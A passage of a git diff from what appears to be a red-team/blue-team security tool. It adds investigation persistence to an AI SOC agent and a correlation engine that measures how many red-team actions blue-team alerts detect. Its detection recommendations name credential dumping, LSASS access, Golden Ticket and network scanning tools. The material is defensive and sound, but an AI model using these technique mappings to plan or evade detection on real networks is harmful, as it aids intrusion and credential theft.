--cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + + - name: Upload coverage report + if: github.ref == 'refs/heads/main' && github.event_name == 'push' && matrix.python-version == '3.12' + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: coverage-report + path: coverage.xml + retention-days: 1 diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 57a1db34..4eba889c 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -93,6 +93,7 @@ repos: rev: v1.19.1 hooks: - id: mypy + exclude: ^tests/ additional_dependencies: - "types-PyYAML" - "types-requests" diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index c528cc52..769f9584 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -15,6 +15,10 @@ from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking from ares.core.models import InvestigationState, TimelineEvent +from ares.core.persistence import ( + create_stored_investigation_from_state, + get_investigation_store, +) from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient @@ -106,7 +110,6 @@ def build_initial_prompt(alert: dict) -> str: if key in labels: mitre_technique = labels[key] break - # Also check annotations if not mitre_technique: for key in ["mitre_technique", "mitre", "technique_id", "technique"]: if key in annotations: @@ -297,7 +300,6 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break - # Create initial timeline event from alert self._create_alert_timeline_event(state, alert) initial_prompt = build_initial_prompt(alert) @@ -340,7 +342,6 @@ async def investigate(self, alert: dict) -> dict: logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") - # Check if agent hit max_steps without proper completion status = "completed" if state.escalated: status = "escalated" @@ -353,6 +354,9 @@ async def investigate(self, alert: dict) -> dict: # Generate report report_path = self._generate_report(state, result) + # Persist investigation for learning + self._persist_investigation(state, status) + dn.log_output("report_path", str(report_path)) dn.log_metric("investigation_success", 1) @@ -375,6 +379,10 @@ async def investigate(self, alert: dict) -> dict: # Still generate a partial report on timeout report_path = self._generate_report(state, None) + + # Persist investigation for learning (even on timeout) + self._persist_investigation(state, "timeout") + return { "investigation_id": investigation_id, "status": "timeout", @@ -387,6 +395,9 @@ async def investigate(self, alert: dict) -> dict: except Exception as e: logger.error(f"Investigation failed: {e}") dn.log_metric("investigation_failed", 1) + + # Persist failed investigation + self._persist_investigation(state, "failed") raise finally: @@ -398,7 +409,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - labels = alert.get("labels", {}) annotations = alert.get("annotations", {}) - # Parse alert timestamp starts_at = alert.get("startsAt", "") try: if starts_at: @@ -408,7 +418,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - except ValueError: alert_time = datetime.now(timezone.utc) - # Build description from alert alert_name = labels.get("alertname", "Unknown Alert") severity = labels.get("severity", "unknown") summary = annotations.get("summary", annotations.get("description", "")) @@ -417,7 +426,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - if summary: description += f" - {summary[:100]}" - # Get MITRE technique from alert mitre_techniques = [] for key in ["mitre_technique", "mitre", "technique_id"]: if labels.get(key): @@ -427,7 +435,6 @@ def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) - mitre_techniques.append(annotations[key]) break - # Create timeline event event = TimelineEvent( id="tl-alert-0000", timestamp=alert_time, @@ -447,3 +454,84 @@ def _generate_report(self, state: InvestigationState, _result) -> Path: generator = MarkdownReportGenerator(self.report_dir) return generator.generate(state) + + def _persist_investigation(self, state: InvestigationState, status: str) -> None: + """Persist investigation results for learning. + + Args: + state: Investigation state to persist + status: Final status (completed, escalated, timeout, failed) + """ + try: + store = get_investigation_store() + + # Create stored investigation from state + stored = create_stored_investigation_from_state(state, status) + + # Store the investigation + store.store_investigation(stored) + + # Update query effectiveness statistics + alert_name = state.alert.get("labels", {}).get("alertname", "unknown") + for query in state.executed_queries: + query_str = query.get("query", "") + if query_str: + # Normalize query for pattern matching + pattern = self._normalize_query_pattern(query_str) + successful = query.get("result_count", 0) > 0 + # Check if any evidence was recorded after this query + produced_evidence = len(state.evidence) > 0 + + store.update_query_effectiveness( + query_pattern=pattern, + successful=successful, + produced_evidence=produced_evidence, + alert_type=alert_name, + ) + + logger.info(f"Persisted investigation {state.investigation_id} to store") + + except Exception as e: + # Don't fail the investigation if persistence fails + logger.warning(f"Failed to persist investigation: {e}") + + def _normalize_query_pattern(self, query: str) -> str: + """Normalize a query string into a reusable pattern. + + Replaces specific values with placeholders for pattern matching. + + Args: + query: Raw query string + + Returns: + Normalized pattern string + """ + import re + + pattern = query + + # Replace timestamps with placeholder + pattern = re.sub( + r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?", + "", + pattern, + ) + + # Replace IP addresses with placeholder + pattern = re.sub(r"\d+\.\d+\.\d+\.\d+", "", pattern) + + # Replace UUIDs with placeholder + pattern = re.sub( + r"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}", + "", + pattern, + flags=re.IGNORECASE, + ) + + # Replace specific hostnames (anything.domain.tld format) + return re.sub( + r"\b[a-z0-9-]+\.[a-z0-9-]+\.[a-z]{2,}\b", + "", + pattern, + flags=re.IGNORECASE, + ) diff --git a/src/ares/core/correlation.py b/src/ares/core/correlation.py new file mode 100644 index 00000000..6c2e0358 --- /dev/null +++ b/src/ares/core/correlation.py @@ -0,0 +1,844 @@ +""" +Red-Blue Correlation Engine. + +Correlates red team attack activities with blue team detections +to measure detection coverage and identify gaps. +""" + +import re +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from pathlib import Path +from typing import Any, ClassVar + +from loguru import logger + + +@dataclass +class RedTeamActivity: + """A single red team activity/action.""" + + timestamp: datetime + technique_id: str | None + technique_name: str | None + action: str + target_ip: str | None + target_host: str | None + credential_used: str | None + success: bool + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this activity.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.target_ip}" + + +@dataclass +class BlueTeamDetection: + """A blue team detection/alert.""" + + timestamp: datetime + alert_name: str + technique_id: str | None + severity: str + target_ip: str | None + target_host: str | None + investigation_id: str | None + status: str # completed, escalated, timeout + evidence_count: int + highest_pyramid_level: int + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this detection.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.alert_name}" + + +@dataclass +class CorrelationMatch: + """A match between red team activity and blue team detection.""" + + red_activity: RedTeamActivity + blue_detection: BlueTeamDetection + time_delta_seconds: float + technique_match: bool + target_match: bool + confidence: float + + @property + def match_quality(self) -> str: + """Assess the quality of this match.""" + if self.technique_match and self.target_match and abs(self.time_delta_seconds) < 300: + return "STRONG" + if self.technique_match and abs(self.time_delta_seconds) < 600: + return "GOOD" + if self.technique_match or (self.target_match and abs(self.time_delta_seconds) < 300): + return "WEAK" + return "TENUOUS" + + +@dataclass +class DetectionGap: + """An undetected red team activity.""" + + red_activity: RedTeamActivity + reason: str + recommended_detection: str | None = None + mitre_data_sources: list[str] = field(default_factory=list) + + +@dataclass +class CorrelationReport: + """Full correlation analysis report.""" + + analysis_timestamp: datetime + red_operation_id: str + time_window_start: datetime + time_window_end: datetime + + # Counts + total_red_activities: int + total_blue_detections: int + matched_activities: int + undetected_activities: int + false_positive_detections: int + + # Details + matches: list[CorrelationMatch] + gaps: list[DetectionGap] + false_positives: list[BlueTeamDetection] + + # Metrics + detection_rate: float + false_positive_rate: float + mean_time_to_detect: float | None # seconds + + # By technique + technique_coverage: dict[str, dict[str, Any]] + + def to_dict(self) -> dict[str, Any]: + """Convert report to dictionary.""" + return { + "analysis_timestamp": self.analysis_timestamp.isoformat(), + "red_operation_id": self.red_operation_id, + "time_window": { + "start": self.time_window_start.isoformat(), + "end": self.time_window_end.isoformat(), + }, + "summary": { + "total_red_activities": self.total_red_activities, + "total_blue_detections": self.total_blue_detections, + "matched_activities": self.matched_activities, + "undetected_activities": self.undetected_activities, + "false_positive_detections": self.false_positive_detections, + "detection_rate": f"{self.detection_rate * 100:.1f}%", + "false_positive_rate": f"{self.false_positive_rate * 100:.1f}%", + "mean_time_to_detect": f"{self.mean_time_to_detect:.1f}s" + if self.mean_time_to_detect + else "N/A", + }, + "technique_coverage": self.technique_coverage, + "matches": [ + { + "red_technique": m.red_activity.technique_id, + "red_action": m.red_activity.action[:100], + "blue_alert": m.blue_detection.alert_name, + "time_delta_seconds": m.time_delta_seconds, + "match_quality": m.match_quality, + "confidence": m.confidence, + } + for m in self.matches + ], + "gaps": [ + { + "technique": g.red_activity.technique_id, + "action": g.red_activity.action[:100], + "timestamp": g.red_activity.timestamp.isoformat(), + "reason": g.reason, + "recommended_detection": g.recommended_detection, + } + for g in self.gaps + ], + "false_positives": [ + { + "alert_name": fp.alert_name, + "technique": fp.technique_id, + "timestamp": fp.timestamp.isoformat(), + } + for fp in self.false_positives + ], + } + + +class RedBlueCorrelator: + """Correlates red team activities with blue team detections. + + This engine: + 1. Parses red team operation reports + 2. Parses blue team investigation reports + 3. Matches activities based on time, technique, and target + 4. Identifies detection gaps + 5. Calculates coverage metrics + """ + + # Time window for matching (activities within this window are considered related) + DEFAULT_TIME_WINDOW_MINUTES = 30 + + TECHNIQUE_PATTERNS: ClassVar[list[str]] = [ + r"T\d{4}(?:\.\d{3})?", # T1234 or T1234.001 + ] + + def __init__( + self, + reports_dir: Path, + time_window_minutes: int = DEFAULT_TIME_WINDOW_MINUTES, + ): + """Initialize the correlator. + + Args: + reports_dir: Directory containing red team and investigation reports + time_window_minutes: Time window for matching activities + """ + self.reports_dir = Path(reports_dir) + self.time_window = timedelta(minutes=time_window_minutes) + + def load_red_team_report(self, report_path: Path) -> tuple[str, list[RedTeamActivity]]: + """Load and parse a red team report. + + Args: + report_path: Path to the red team report markdown file + + Returns: + Tuple of (operation_id, list of activities) + """ + content = report_path.read_text() + activities = [] + + # Extract operation ID + operation_id_match = re.search(r"\*\*Operation ID\*\*:\s*(\S+)", content) + operation_id = operation_id_match.group(1) if operation_id_match else "unknown" + + # Extract target IP + target_ip_match = re.search(r"\*\*Target\*\*:\s*(\d+\.\d+\.\d+\.\d+)", content) + target_ip = target_ip_match.group(1) if target_ip_match else None + + # Extract start time + started_match = re.search(r"\*\*Started\*\*:\s*(.+?)(?:\n|$)", content) + if started_match: + try: + started_at = datetime.strptime( + started_match.group(1).strip(), "%Y-%m-%d %H:%M:%S UTC" + ).replace(tzinfo=timezone.utc) + except ValueError: + started_at = datetime.now(timezone.utc) + else: + started_at = datetime.now(timezone.utc) + + # Extract hosts discovered + hosts_section = re.search(r"### Hosts \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if hosts_section: + host_count = int(hosts_section.group(1)) + if host_count > 0: + activities.append( + RedTeamActivity( + timestamp=started_at, + technique_id="T1046", # Network Service Discovery + technique_name="Network Service Discovery", + action=f"Discovered {host_count} host(s) via network scanning", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Extract credentials obtained + creds_section = re.search(r"### Credentials \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if creds_section: + creds_content = creds_section.group(2) + + cred_matches = re.findall( + r"\*\*(\S+)\*\*\s*\n.*?Source:\s*(.+?)(?:\n|$)", creds_content + ) + for username, source in cred_matches: + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=1), # Slightly after start + technique_id="T1110" if "guessing" in source.lower() else "T1003", + technique_name="Credential Guessing" + if "guessing" in source.lower() + else "Credential Dumping", + action=f"Obtained credential for {username} via {source}", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + metadata={"username": username, "source": source}, + ) + ) + + # Extract MITRE techniques from timeline + timeline_section = re.search( + r"### Timeline of Key Events(.*?)(?=---|\Z)", content, re.DOTALL + ) + if timeline_section: + timeline_content = timeline_section.group(1) + event_matches = re.findall( + r"\|\s*([^|]+)\s*\|\s*([^|]+)\s*\|\s*(T\d{4}(?:\.\d{3})?)\s*\|", timeline_content + ) + for timestamp_str, description, technique_id in event_matches: + try: + event_time = datetime.fromisoformat( + timestamp_str.strip().replace("Z", "+00:00") + ) + except ValueError: + event_time = started_at + activities.append( + RedTeamActivity( + timestamp=event_time, + technique_id=technique_id.strip(), + technique_name=None, + action=description.strip(), + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Check for domain admin / golden ticket + if "Domain Admin Access**: ✓" in content or "has_domain_admin: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=5), + technique_id="T1078.002", + technique_name="Valid Accounts: Domain Accounts", + action="Achieved Domain Admin access", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + if "Golden Ticket**: ✓" in content or "has_golden_ticket: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=6), + technique_id="T1558.001", + technique_name="Golden Ticket", + action="Generated Golden Ticket for persistence", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + logger.info(f"Loaded {len(activities)} activities from red team report {operation_id}") + return operation_id, activities + + def load_investigation_report(self, report_path: Path) -> BlueTeamDetection | None: + """Load and parse a blue team investigation report. + + Args: + report_path: Path to the investigation report markdown file + + Returns: + BlueTeamDetection object or None if parsing fails + """ + content = report_path.read_text() + + # Skip DatasourceNoData reports + if "DatasourceNoData" in report_path.name: + return None + + # Extract investigation ID + inv_id_match = re.search(r"\*\*Investigation ID:\*\*\s*`?(\S+?)`?(?:\n|$)", content) + investigation_id = inv_id_match.group(1) if inv_id_match else None + + # Extract alert name + alert_match = re.search(r"\|\s*Alert Name\s*\|\s*(.+?)\s*\|", content) + alert_name = alert_match.group(1).strip() if alert_match else "Unknown" + + # Extract severity + severity_match = re.search(r"\|\s*Severity\s*\|\s*(\w+)\s*\|", content) + severity = severity_match.group(1).strip() if severity_match else "unknown" + + # Extract timestamp from alert payload + starts_at_match = re.search(r'"startsAt":\s*"([^"]+)"', content) + if starts_at_match: + try: + timestamp = datetime.fromisoformat(starts_at_match.group(1).replace("Z", "+00:00")) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + # Try to extract from filename + date_match = re.search(r"(\d{8}_\d{6})", report_path.name) + if date_match: + try: + timestamp = datetime.strptime(date_match.group(1), "%Y%m%d_%H%M%S").replace( + tzinfo=timezone.utc + ) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + timestamp = datetime.now(timezone.utc) + + # Extract MITRE technique + technique_match = re.search(r"(T\d{4}(?:\.\d{3})?)", content) + technique_id = technique_match.group(1) if technique_match else None + + # Extract status + status_match = re.search(r"\|\s*Status\s*\|\s*(\w+)", content) + status = status_match.group(1).strip().lower() if status_match else "unknown" + + # Extract evidence count + evidence_match = re.search(r"\*\*Evidence Collected:\*\*\s*(\d+)", content) + evidence_count = int(evidence_match.group(1)) if evidence_match else 0 + + # Extract pyramid level + pyramid_match = re.search(r"\*\*Highest Pyramid Level:\*\*\s*(\d+)", content) + highest_pyramid_level = int(pyramid_match.group(1)) if pyramid_match else 0 + + # Extract target IP from content + ip_match = re.search(r"(\d+\.\d+\.\d+\.\d+)", content) + target_ip = ip_match.group(1) if ip_match else None + + return BlueTeamDetection( + timestamp=timestamp, + alert_name=alert_name, + technique_id=technique_id, + severity=severity, + target_ip=target_ip, + target_host=None, + investigation_id=investigation_id, + status=status, + evidence_count=evidence_count, + highest_pyramid_level=highest_pyramid_level, + ) + + def load_all_reports( + self, + ) -> tuple[list[tuple[str, list[RedTeamActivity]]], list[BlueTeamDetection]]: + """Load all reports from the reports directory. + + Returns: + Tuple of (list of (operation_id, activities), list of detections) + """ + red_team_reports = [] + blue_team_detections = [] + + for report_file in self.reports_dir.glob("*.md"): + if report_file.name.startswith("redteam-"): + try: + operation_id, activities = self.load_red_team_report(report_file) + red_team_reports.append((operation_id, activities)) + except Exception as e: + logger.warning(f"Failed to parse red team report {report_file}: {e}") + + elif report_file.name.startswith("investigation_"): + try: + detection = self.load_investigation_report(report_file) + if detection: + blue_team_detections.append(detection) + except Exception as e: + logger.warning(f"Failed to parse investigation report {report_file}: {e}") + + logger.info( + f"Loaded {len(red_team_reports)} red team reports, " + f"{len(blue_team_detections)} investigation reports" + ) + return red_team_reports, blue_team_detections + + def correlate( # noqa: PLR0912 + self, + red_activities: list[RedTeamActivity], + blue_detections: list[BlueTeamDetection], + operation_id: str = "unknown", + ) -> CorrelationReport: + """Correlate red team activities with blue team detections. + + Args: + red_activities: List of red team activities + blue_detections: List of blue team detections + operation_id: Red team operation ID + + Returns: + CorrelationReport with analysis results + """ + matches: list[CorrelationMatch] = [] + matched_red_keys: set[str] = set() + matched_blue_keys: set[str] = set() + + red_activities = sorted(red_activities, key=lambda x: x.timestamp) + blue_detections = sorted(blue_detections, key=lambda x: x.timestamp) + + if red_activities: + time_window_start = min(a.timestamp for a in red_activities) - self.time_window + time_window_end = max(a.timestamp for a in red_activities) + self.time_window + else: + time_window_start = datetime.now(timezone.utc) - timedelta(hours=1) + time_window_end = datetime.now(timezone.utc) + + # Match activities to detections + for red_activity in red_activities: + best_match: CorrelationMatch | None = None + best_confidence = 0.0 + + for detection in blue_detections: + time_delta = (detection.timestamp - red_activity.timestamp).total_seconds() + + if abs(time_delta) > self.time_window.total_seconds(): + continue + + technique_match = ( + red_activity.technique_id is not None + and detection.technique_id is not None + and red_activity.technique_id == detection.technique_id + ) + + target_match = ( + red_activity.target_ip is not None + and detection.target_ip is not None + and red_activity.target_ip == detection.target_ip + ) + + confidence = 0.0 + if technique_match: + confidence += 0.5 + if target_match: + confidence += 0.3 + # Time proximity bonus (closer = higher confidence) + time_bonus = max(0, 1 - abs(time_delta) / self.time_window.total_seconds()) * 0.2 + confidence += time_bonus + + if confidence > best_confidence: + best_confidence = confidence + best_match = CorrelationMatch( + red_activity=red_activity, + blue_detection=detection, + time_delta_seconds=time_delta, + technique_match=technique_match, + target_match=target_match, + confidence=confidence, + ) + + if best_match and best_match.confidence >= 0.3: + matches.append(best_match) + matched_red_keys.add(red_activity.key) + matched_blue_keys.add(best_match.blue_detection.key) + + # Identify detection gaps (undetected red activities) + gaps: list[DetectionGap] = [] + for activity in red_activities: + if activity.key not in matched_red_keys: + gap = DetectionGap( + red_activity=activity, + reason=self._determine_gap_reason(activity, blue_detections), + recommended_detection=self._recommend_detection(activity), + ) + gaps.append(gap) + + # Identify false positives (detections without matching red activity) + false_positives: list[BlueTeamDetection] = [] + for detection in blue_detections: + if ( + detection.key not in matched_blue_keys + and time_window_start <= detection.timestamp <= time_window_end + ): + false_positives.append(detection) + + total_red = len(red_activities) + matched_count = len(matches) + detection_rate = matched_count / total_red if total_red > 0 else 0.0 + + detections_in_window = len( + [d for d in blue_detections if time_window_start <= d.timestamp <= time_window_end] + ) + false_positive_rate = ( + len(false_positives) / detections_in_window if detections_in_window > 0 else 0.0 + ) + + time_deltas = [abs(m.time_delta_seconds) for m in matches if m.time_delta_seconds >= 0] + mean_ttd = sum(time_deltas) / len(time_deltas) if time_deltas else None + + technique_coverage = self._calculate_technique_coverage(red_activities, matches, gaps) + + return CorrelationReport( + analysis_timestamp=datetime.now(timezone.utc), + red_operation_id=operation_id, + time_window_start=time_window_start, + time_window_end=time_window_end, + total_red_activities=total_red, + total_blue_detections=len(blue_detections), + matched_activities=matched_count, + undetected_activities=len(gaps), + false_positive_detections=len(false_positives), + matches=matches, + gaps=gaps, + false_positives=false_positives, + detection_rate=detection_rate, + false_positive_rate=false_positive_rate, + mean_time_to_detect=mean_ttd, + technique_coverage=technique_coverage, + ) + + def _determine_gap_reason( + self, + activity: RedTeamActivity, + detections: list[BlueTeamDetection], + ) -> str: + """Determine why an activity was not detected.""" + if not activity.technique_id: + return "Activity has no associated MITRE technique" + + technique_alerts = [d for d in detections if d.technique_id == activity.technique_id] + if not technique_alerts: + return f"No alert rules configured for technique {activity.technique_id}" + + return "Alert exists but did not trigger within time window (possible log ingestion delay or query timeout)" + + def _recommend_detection(self, activity: RedTeamActivity) -> str | None: + """Recommend a detection for an undetected activity.""" + technique_recommendations = { + "T1046": "Add alert for network scanning patterns (nmap, masscan)", + "T1110": "Add alert for multiple failed authentication attempts", + "T1003": "Add alert for LSASS access or credential dumping tools", + "T1078.002": "Add alert for new domain admin group membership", + "T1558.001": "Add alert for krbtgt service ticket requests with RC4", + "T1021.002": "Add alert for remote SMB connections from unusual sources", + } + if activity.technique_id: + return technique_recommendations.get(activity.technique_id) + return None + + def _calculate_technique_coverage( + self, + activities: list[RedTeamActivity], + matches: list[CorrelationMatch], + gaps: list[DetectionGap], + ) -> dict[str, dict[str, Any]]: + """Calculate detection coverage per technique.""" + coverage: dict[str, dict[str, Any]] = {} + + for activity in activities: + if activity.technique_id: + if activity.technique_id not in coverage: + coverage[activity.technique_id] = { + "total": 0, + "detected": 0, + "missed": 0, + "detection_rate": 0.0, + } + coverage[activity.technique_id]["total"] += 1 + + for match in matches: + if match.red_activity.technique_id: + coverage[match.red_activity.technique_id]["detected"] += 1 + + for gap in gaps: + if gap.red_activity.technique_id: + coverage[gap.red_activity.technique_id]["missed"] += 1 + + for data in coverage.values(): + if data["total"] > 0: + data["detection_rate"] = data["detected"] / data["total"] + + return coverage + + def generate_report_markdown(self, report: CorrelationReport) -> str: # noqa: PLR0912 + """Generate a markdown report from correlation results. + + Args: + report: CorrelationReport object + + Returns: + Markdown formatted report string + """ + lines = [ + "# Red-Blue Correlation Report", + "", + f"**Analysis Time:** {report.analysis_timestamp.strftime('%Y-%m-%d %H:%M:%S UTC')}", + f"**Red Team Operation:** {report.red_operation_id}", + f"**Time Window:** {report.time_window_start.strftime('%Y-%m-%d %H:%M')} to {report.time_window_end.strftime('%Y-%m-%d %H:%M')}", + "", + "---", + "", + "## Executive Summary", + "", + "| Metric | Value |", + "|--------|-------|", + f"| Red Team Activities | {report.total_red_activities} |", + f"| Blue Team Detections | {report.total_blue_detections} |", + f"| Matched (Detected) | {report.matched_activities} |", + f"| Detection Gaps | {report.undetected_activities} |", + f"| False Positives | {report.false_positive_detections} |", + f"| **Detection Rate** | **{report.detection_rate * 100:.1f}%** |", + f"| False Positive Rate | {report.false_positive_rate * 100:.1f}% |", + f"| Mean Time to Detect | {f'{report.mean_time_to_detect:.0f}s' if report.mean_time_to_detect else 'N/A'} |", + "", + ] + + # Detection rate assessment + if report.detection_rate >= 0.8: + assessment = "EXCELLENT - Blue team is detecting most red team activities" + elif report.detection_rate >= 0.6: + assessment = "GOOD - Majority of activities detected, some gaps remain" + elif report.detection_rate >= 0.4: + assessment = "MODERATE - Significant detection gaps exist" + else: + assessment = "POOR - Most red team activities went undetected" + + lines.extend( + [ + f"### Assessment: {assessment}", + "", + "---", + "", + ] + ) + + # Technique coverage + if report.technique_coverage: + lines.extend( + [ + "## Technique Coverage", + "", + "| Technique | Total | Detected | Missed | Rate |", + "|-----------|-------|----------|--------|------|", + ] + ) + for tech_id, data in sorted(report.technique_coverage.items()): + rate_str = f"{data['detection_rate'] * 100:.0f}%" + rate_emoji = ( + "✅" + if data["detection_rate"] >= 0.8 + else "⚠️" + if data["detection_rate"] >= 0.5 + else "❌" + ) + lines.append( + f"| {tech_id} | {data['total']} | {data['detected']} | {data['missed']} | {rate_emoji} {rate_str} |" + ) + lines.extend(["", "---", ""]) + + # Successful detections + if report.matches: + lines.extend( + [ + "## Successful Detections", + "", + "| Red Activity | Blue Alert | Time Delta | Quality |", + "|--------------|------------|------------|---------|", + ] + ) + for match in report.matches[:20]: # Limit to 20 + lines.append( + f"| {match.red_activity.technique_id or 'N/A'}: {match.red_activity.action[:40]}... | " + f"{match.blue_detection.alert_name[:30]}... | " + f"{match.time_delta_seconds:.0f}s | " + f"{match.match_quality} |" + ) + lines.extend(["", "---", ""]) + + # Detection gaps + if report.gaps: + lines.extend( + [ + "## Detection Gaps (Undetected Activities)", + "", + "| Technique | Activity | Reason | Recommendation |", + "|-----------|----------|--------|----------------|", + ] + ) + for gap in report.gaps[:20]: # Limit to 20 + lines.append( + f"| {gap.red_activity.technique_id or 'N/A'} | " + f"{gap.red_activity.action[:40]}... | " + f"{gap.reason[:40]}... | " + f"{gap.recommended_detection or 'N/A'} |" + ) + lines.extend(["", "---", ""]) + + # False positives + if report.false_positives: + lines.extend( + [ + "## False Positives (Detections without Red Activity)", + "", + "| Alert | Technique | Time |", + "|-------|-----------|------|", + ] + ) + for fp in report.false_positives[:10]: # Limit to 10 + lines.append( + f"| {fp.alert_name[:40]}... | {fp.technique_id or 'N/A'} | {fp.timestamp.strftime('%H:%M:%S')} |" + ) + lines.extend(["", "---", ""]) + + # Recommendations + lines.extend( + [ + "## Recommendations", + "", + ] + ) + + if report.gaps: + # Group recommendations by technique + recommendations = {} + for gap in report.gaps: + if gap.recommended_detection: + tech = gap.red_activity.technique_id or "General" + if tech not in recommendations: + recommendations[tech] = gap.recommended_detection + + for i, (tech, rec) in enumerate(recommendations.items(), 1): + lines.append(f"{i}. **{tech}**: {rec}") + + if report.detection_rate < 0.8: + lines.extend( + [ + "", + "### General Improvements", + "- Review query timeout issues in Loki/Grafana", + "- Ensure log ingestion latency is < 60 seconds", + "- Add missing detection rules for uncovered techniques", + "- Consider increasing alert rule evaluation frequency", + ] + ) + + lines.extend( + [ + "", + "---", + "", + "*Report generated by Ares Red-Blue Correlation Engine*", + ] + ) + + return "\n".join(lines) + + def run_full_analysis(self) -> list[CorrelationReport]: + """Run correlation analysis on all reports in the directory. + + Returns: + List of CorrelationReport objects, one per red team operation + """ + red_reports, blue_detections = self.load_all_reports() + + reports = [] + for operation_id, activities in red_reports: + report = self.correlate(activities, blue_detections, operation_id) + reports.append(report) + + # Generate and save markdown report + markdown = self.generate_report_markdown(report) + report_path = self.reports_dir / f"correlation_{operation_id}.md" + report_path.write_text(markdown) + logger.success(f"Generated correlation report: {report_path}") + + return reports diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index cf96a4b8..bb64d903 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -12,19 +12,20 @@ from loguru import logger from ares.core.models import InvestigationState +from ares.core.query_resilience import QueryResilientExecutor, get_resilient_executor from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import ( CompletionTools, GrafanaTools, InvestigationTools, + LearningTools, QueryTemplateTools, QuestionEngineTools, escalate_investigation, ) from ares.tools.shared import MITRELookupTools -# Load system instructions from template SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja") # Track query calls - reset per investigation via reset_query_tracking() @@ -41,6 +42,8 @@ def reset_query_tracking(): """Reset query tracking for a new investigation.""" + from ares.core.query_resilience import reset_resilient_executor + global \ _total_queries, \ _consecutive_queries, \ @@ -54,6 +57,7 @@ def reset_query_tracking(): _executed_queries = [] _seen_queries = {} _current_state = None + reset_resilient_executor() def set_investigation_state(state: "InvestigationState"): @@ -147,29 +151,34 @@ def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None) } _executed_queries.append(query_record) - # Also add to investigation state if available if _current_state: _current_state.executed_queries.append(query_record) -def create_rate_limited_mcp_tool(original_tool: Any) -> Any: +def create_rate_limited_mcp_tool( + original_tool: Any, resilient_executor: QueryResilientExecutor | None = None +) -> Any: """ - Wrap an MCP tool with rate limiting. + Wrap an MCP tool with rate limiting and resilient execution. The wrapper checks the global query counter BEFORE executing. If limit is reached, returns an error message instead of executing. This ensures the LLM sees the limit message even when batching queries. + + Features: + - Rate limiting to prevent query abuse + - Duplicate query detection + - Automatic retry with exponential backoff (via resilient executor) + - Automatic time range reduction on timeout """ - # Get the tool name for checking if it's a query tool tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "") # Only wrap query tools if "query_loki" not in tool_name and "query_prometheus" not in tool_name: return original_tool - logger.debug(f"Wrapping MCP tool with rate limiting: {tool_name}") + logger.debug(f"Wrapping MCP tool with rate limiting and resilience: {tool_name}") - # Get the original function to wrap original_fn = getattr(original_tool, "fn", None) if original_fn is None and callable(original_tool): original_fn = original_tool @@ -178,15 +187,15 @@ def create_rate_limited_mcp_tool(original_tool: Any) -> Any: logger.warning(f"Could not find callable for tool {tool_name}, not wrapping") return original_tool + executor = resilient_executor or get_resilient_executor() + @functools.wraps(original_fn) async def rate_limited_wrapper(*args, **kwargs): - # Check limit BEFORE executing error_msg = _check_query_limit() if error_msg: logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached") return error_msg - # Check for duplicate query query_str = kwargs.get("logql") or kwargs.get("expr") or "" if query_str: dup_msg = _check_duplicate_query(query_str) @@ -197,18 +206,69 @@ async def rate_limited_wrapper(*args, **kwargs): # Increment counter _increment_query_count(tool_name) - # Execute original + # Extract time parameters for resilient execution + start_time = kwargs.get("startRfc3339") or kwargs.get("start_time") or kwargs.get("start") + end_time = kwargs.get("endRfc3339") or kwargs.get("end_time") or kwargs.get("end") + + # If we have time parameters, use resilient executor + if start_time and end_time and query_str: + logger.info(f"Using resilient executor for {tool_name}") + try: + + async def query_wrapper(logql: str, start_time: str, end_time: str, **kw): + updated_kwargs = {**kwargs} + if "startRfc3339" in kwargs: + updated_kwargs["startRfc3339"] = start_time + updated_kwargs["endRfc3339"] = end_time + elif "start_time" in kwargs: + updated_kwargs["start_time"] = start_time + updated_kwargs["end_time"] = end_time + elif "start" in kwargs: + updated_kwargs["start"] = start_time + updated_kwargs["end"] = end_time + if "logql" in 